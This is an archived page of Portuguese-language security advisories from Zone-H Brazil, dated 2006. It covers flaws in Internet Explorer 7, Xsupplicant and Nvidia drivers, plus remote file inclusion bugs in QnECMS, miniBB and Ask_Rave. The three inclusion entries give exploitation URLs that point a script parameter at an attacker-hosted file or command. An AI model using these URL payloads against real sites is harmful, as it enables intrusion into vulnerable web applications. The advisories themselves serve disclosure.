Zone-H
Home arrow Avisos de Segurança
03 de December de 2008
 
 
Ataques desta semana
O.S.  Defs.  %
Linux  4747  66.95%
Win 2003  1457  20.55%
Solaris 9/10  351  4.95%
FreeBSD  229  3.23%
Win 2000  164  2.31%
Other  142  2.00%

Total de ataques: 7090 dos quais 3494 único(s) no ip e 3596 invasão(ões) em massa

Menu Principal
Home
Guerra Digital
Geopolítica
Notícias ITsec
Avisos de Segurança
Test Drive
360°
Sites atacados
Eventos do Zone-H
Fórum
Publicações
Zone-H Amigos/Parceiros
Contate-nos
Sobre este Site
Membros do Zone-H BR
Favoritos geral
Área de Download
Zone-H.org
Área de download
Avisos de Segurança
Internet Explorer 7 Falha de injeção de janela Imprimir E-mail
Avaliação do Usuário: / 1
Por Marcelo Almeida (Vympel)   
30 de October de 2006

Uma falha de segurança foi reportada pela Secunia que pode comprometer usuários usando Internet Explorer 7.
Enquanto o usuário estiver navegando, pode se injetar conteúdo de outros sites sem que ele perceba que o site que está sendo mostrado não é o site onde estava navegando.

A Secunia disponibilizou um link onde os usuários podem testar se seu sistema é afetado.
http://secunia.com/multiple_browsers_window_injection_vulnerability_test/

Solução
A Microsoft não desenvolveu nenhuma atualização para esta falha.
Os usuários que tiverem seu sistema vulnerável não devem navegar em sites inseguros ao mesmo tempo que sites seguros.

Aviso original

 

 
Xsupplicant "eap_do_notify()" Falha de Buffer Overflow Imprimir E-mail
Avaliação do Usuário: / 0
Por Marcelo Almeida (Vympel)   
30 de October de 2006

Uma falha de segurança foi reportada no Xsupplicant que pode comprometer o sistema afetado.

O erro é causado por um erro no limite da função "eap_do_notifiY". Esta falha causa um stack-based overflow quando é enviado um pacote EAP quebrado.

Se explorada corretamente, pode se executar comandos no sistema afetado com privilégios de "root".

Solução:
Atualize para a versão 1.2.8.

Descoberta por:
Yannick Van Osselaer

Aviso original:
http://open1x.sourceforge.net/
http://www.mandriva.com/security/advisories?name=MDKSA-2006:189
http://open1x.cvs.sourceforge.net/ope...icant/src/eap.c?r1=1.135&r2=1.136

 
QnECMS: Inclusão de Arquivos Remotos Imprimir E-mail
Avaliação do Usuário: / 0
30 de October de 2006
Nome do Script: QnECMS
Site do script: http://www.qnecms.co.uk/
Versão Afetada: 2.5.6 e anteriores

Encontrado por K-159
Email: eufrato[at]gmail.com

Exploração:

http://victim.com/[path]/admin/include/headerscripts.php?adminfolderpath=[attacker]
 
miniBB: Inclusão de Arquivos Remotos Imprimir E-mail
Avaliação do Usuário: / 0
26 de October de 2006
Nome do Script: miniBB
Site do script: http://www.minibb.net/download.html
Versão Afetada: v.2.0.2

Encontrado pelo Polonês Kacper (a.k.a Rahim)
Email: Este endereço de e-mail está sendo protegido de spam, você precisa de Javascript habilitado para vê-lo

Exploração:

http://www.site.com/[miniBB_path]/bb_func_txt.php?pathToFiles=[CMD]
 
Falha de Buffer overflow no driver da Nvidia Imprimir E-mail
Avaliação do Usuário: / 2
Por Alan Gurgel (hipn0s)   
26 de October de 2006
nvideaFoi informado pela empresa de segurança Rapid7 que uma falha de segurança nos drivers Nvidia utilizado por muitos sistemas linux possibilitam que usuários mal intencionados comprometam todo o computador através dos drivers usados pelo adaptador gráfico da companhia.

O que faz com que a briga contra drivers proprietários aumente ainda mais, a vulnerabilidade é de conhecimento interno desde dezembro de 2004, mas remanesce vulnerável, a falha possibilita acesso completo de root , acionável localmente ou via uma conexão remota utilizando um exploit público...

Leia mais...
 
Ask_Rave: Inclusão de Arquivos Remotos Imprimir E-mail
Avaliação do Usuário: / 0
26 de October de 2006
Nome do Script: ask_rave
Site do script: http://rave.jk-digital.com/site/scripts/files/ask_0_9PR.zip
Versão Afetada: 0.9 PR

Encontrado por v1per-haCker
Email: v1per-hacker[at]hotmail.com

Exploração:

http://localhost/path/end.php?footfile=http://EvElCoDe.txt?
 
<< Início < Anterior 1 2 3 4 5 6 7 8 9 Próximo > Fim >>

Resultados 157 - 182 de 234
 
Top! Top!